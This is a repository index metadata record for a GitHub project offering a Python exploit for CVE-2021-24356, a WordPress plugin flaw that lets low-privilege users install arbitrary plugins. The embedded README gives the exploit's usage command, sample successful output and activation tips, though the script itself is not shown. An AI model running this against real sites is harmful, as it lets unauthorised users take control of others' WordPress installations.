{"id":21125733,"url":"https://github.com/randomrobbiebf/cve-2021-24356","last_synced_at":"2026-04-28T09:05:49.506Z","repository":{"id":187300371,"uuid":"676669833","full_name":"RandomRobbieBF/CVE-2021-24356","owner":"RandomRobbieBF","description":"Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation","archived":false,"fork":false,"pushed_at":"2023-08-09T18:26:57.000Z","size":17,"stargazers_count":0,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-01-01T05:47:31.906Z","etag":null,"topics":["cve-2021-24356","wordpress-exploit","wordpress-plugin"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-08-09T18:24:19.000Z","updated_at":"2024-08-12T20:32:24.000Z","dependencies_parsed_at":null,"dependency_job_id":"42d173c3-d434-48d8-a932-3009571be9ed","html_url":"https://github.com/RandomRobbieBF/CVE-2021-24356","commit_stats":null,"previous_names":["randomrobbiebf/cve-2021-24356"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2021-24356","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/releases
","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2021-24356/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2021-24356/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32373551,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-27T20:07:02.737Z","status":"online","status_checked_at":"2026-04-28T02:00:07.250Z","response_time":56,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2021-24356","wordpress-exploit","wordpress-plugin"],"created_at":"2024-11-20T04:36:38.350Z","updated_at":"2026-04-28T09:05:49.478Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2021-24356\nSimple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation\n\n# Description\nA lack of capability checks and insufficient nonce check on the AJAX action in the plugin, made it possible for authenticated users to install arbitrary plugins on vulnerable sites. 
\n\nHow to use\n----\n\n```\n$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks\nGetting REST API Nonce!\nNonce Found: dd72f43027\nInstalling Plugin!\n{\"success\":true,\"data\":\"Plugin is installed successfully!\"}\nActivating Plugin!\n{\"success\":true,\"data\":\"BetterLinks is activated!\"}\n```\n\nNote: Some plugins might not activate. If not, you need to change the sluga variable to the path/file.php that is the main file for the plugin. The script currently works really well when the slug is something like betterlinks and the main file of the plugin is called betterlinks.php\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2021-24356","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2021-24356","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2021-24356/lists"}